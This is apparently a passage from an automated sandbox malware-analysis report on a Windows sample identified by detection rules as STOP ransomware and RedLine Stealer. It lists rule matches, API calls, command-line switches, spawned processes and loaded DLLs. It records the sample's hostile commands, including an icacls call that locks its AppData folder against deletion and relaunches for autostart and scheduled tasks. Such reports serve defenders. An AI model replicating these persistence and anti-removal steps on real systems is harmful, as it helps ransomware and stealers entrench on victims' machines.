          Source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000B.00000002.2502982879.000000000213D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: Process Memory Space: file.exe PID: 6456, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 1208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 4616, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 5088, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 6420, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 2052, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 1208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 3392, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: file.exe PID: 4856, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@18/1329@4/2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A4C54 FillConsoleOutputCharacterW,lstrcatW,InterlockedExchangeAdd,LoadIconW,LocalShrink,FindAtomW,DeleteAtom,GetConsoleSelectionInfo,_memset,GetDefaultCommConfigW,RaiseException,ReadConsoleOutputA,WaitForDebugEvent,EnumDateFormatsA,TryEnterCriticalSection,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetDateFormatA,GetLastError,GetSystemTimes,FoldStringW,GetConsoleAliasesLengthA,GetNamedPipeHandleStateA,GetComputerNameA,GetFileAttributesW,GetBinaryTypeA,FormatMessageA,_malloc,_malloc,_mbrtowc,_calloc,LocalAlloc,LoadLibraryA,GlobalFlags,GetFileType,InterlockedDecrement,0_2_004A4C54
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0214E7C6 CreateToolhelp32Snapshot,Module32First,0_2_0214E7C6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\geo[1].jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\file.exeCommand line argument: R@0_2_00405230
          Source: C:\Users\user\Desktop\file.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: --ForNetRes2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: --Task2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: --AutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: --Service2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: X1P2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: runas2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: x2Q2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: x*P2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: C:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: D:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: 7P2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: %username%2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCommand line argument: F:\2_2_00419F90
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeReversingLabs: Detection: 34%
          Source: file.exeVirustotal: Detection: 36%
          Source: file.exeString found in binary or memory: set-addPolicy
          Source: file.exeString found in binary or memory: id-cmc-addExtensions
          Source: file.exeString found in binary or memory: set-addPolicy
          Source: file.exeString found in binary or memory: id-cmc-addExtensions
          Source: file.exeString found in binary or memory: set-addPolicy
          Source: file.exeString found in binary or memory: id-cmc-addExtensions
          Source: file.exeString found in binary or memory: set-addPolicy
          Source: file.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --Task
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --Task
          Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStartJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStartJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: sspicli.dll
